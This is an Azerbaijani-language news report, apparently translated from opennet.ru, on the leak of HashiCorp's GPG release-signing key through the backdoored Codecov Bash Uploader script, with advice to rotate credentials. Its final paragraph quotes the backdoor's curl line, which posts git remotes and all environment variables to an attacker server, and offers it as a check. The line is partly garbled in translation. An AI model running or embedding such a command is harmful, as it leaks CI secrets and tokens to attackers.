Vagrant, Packer, Nomad və Terraform açıq mənbə alətlərini inkişaf etdirməklə tanınan HashiCorp, buraxılışları təsdiqləyən rəqəmsal imza yaratmaq üçün istifadə edilən şəxsi GPG açarının sızdığını elan etdi. GPG açarına giriş əldə edən hücumçular HashiCorp məhsullarını düzgün rəqəmsal imza ilə yoxlayaraq, potensial olaraq gizli dəyişikliklər edə bilər. Eyni zamanda şirkət bəyan edib ki, audit zamanı bu cür dəyişikliklərin edilməsi cəhdlərinin izləri aşkar edilməyib.
Hazırda oğurlanmış GPG açarı ləğv edilib və onun yerinə yeni açar təqdim edilib. Problem yalnız SHA256SUM və SHA256SUM.sig fayllarından istifadə etməklə yoxlamaya təsir etdi və releases.hashicorp.com vasitəsilə təmin edilən Linux DEB və RPM paketləri üçün rəqəmsal imzaların yaradılmasına, həmçinin macOS və Windows (AuthentiCode) üçün buraxılış yoxlama mexanizmlərinə təsir göstərmədi. .
Sızma, davamlı inteqrasiya sistemlərindən əhatə hesabatlarını endirmək üçün nəzərdə tutulmuş infrastrukturda Codecov Bash Uploader (codecov-bash) skriptinin istifadəsi səbəbindən baş verdi. Codecov şirkətinə hücum zamanı göstərilən skriptdə arxa qapı gizlədilib, onun vasitəsilə təcavüzkarların serverinə parollar və şifrələmə açarları göndərilib.
Hack etmək üçün təcavüzkarlar Codecov.io saytından paylanmış Bash Uploader skriptində dəyişikliklər etmək üçün lazım olan GCS-ə (Google Cloud Storage) giriş məlumatlarını çıxarmağa imkan verən Codecov Docker təsvirinin yaradılması prosesindəki xətadan istifadə etdilər. vebsayt. Dəyişikliklər yanvarın 31-də yenidən edildi, iki ay ərzində aşkar edilmədi və təcavüzkarlara müştərinin davamlı inteqrasiya sistemi mühitlərində saxlanılan məlumatları çıxarmağa imkan verdi. Əlavə edilmiş zərərli koddan istifadə edərək təcavüzkarlar sınaqdan keçirilmiş Git repozitoriyası və bütün mühit dəyişənləri, o cümlədən Amazon Web Services və GitHub kimi proqram koduna, depolara və xidmətlərə girişi təşkil etmək üçün davamlı inteqrasiya sistemlərinə ötürülən tokenlər, şifrələmə açarları və parollar haqqında məlumat əldə edə bilərdilər.
Birbaşa zəngə əlavə olaraq, Codecov Bash Uploader skripti istifadəçiləri də problemdən təsirlənən Codecov-action (Github), Codecov-circleci-orb və Codecov-bitrise-step kimi digər yükləyicilərin bir hissəsi kimi istifadə edilmişdir. Codecov-bash və əlaqəli məhsulların bütün istifadəçilərinə öz infrastrukturlarını yoxlamaq, həmçinin parolları və şifrələmə açarlarını dəyişmək tövsiyə olunur. Skriptdə arxa qapının olmasını curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” xəttinin olması ilə yoxlaya bilərsiniz http:// /yüklə/v2 || doğru
Mənbə: opennet.ru